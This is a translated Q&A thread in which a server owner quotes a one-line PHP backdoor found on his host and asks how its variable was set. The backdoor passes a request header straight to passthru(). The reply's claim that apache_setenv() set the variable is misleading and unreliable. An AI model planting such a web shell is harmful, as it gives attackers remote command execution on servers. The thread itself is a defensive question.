PHP Backdoor код

Question

PHP Backdoor код

Я нашел php бэкдор на моем хосте.

<? passthru(getenv(HTTP_ACCEPT_TROLOLO)); ?>

Я вижу запросы в журнале доступа к этому файлу php, которые были запросами POST, но я не знаю, как был установлен SETENV для этой переменной; Может кто-нибудь объяснить, как можно установить такую переменную и, если возможно, где я могу ограничить / отключить установку таких переменных на стороне сервера.

Спасибо

-ЧАС.

1

apache-2.2 php hacking setenv

Источник

Hrvoje Špoljar 22 июл '11 в 00:12

1 ответ

Другие вопросы по тегам apache-2.2 php hacking setenv

genesis 22 июл '11 в 00:30 2011-07-22 00:30 · Answer 1 · 2011-07-22 00:30

Это было установлено apache_setenv();

Ищи

apache_setenv("HTTP_ACCEPT_TROL

или же

apache_setenv('HTTP_ACCEPT_TROL

и вы найдете свой ответ

1

Источник

genesis 22 июл '11 в 00:30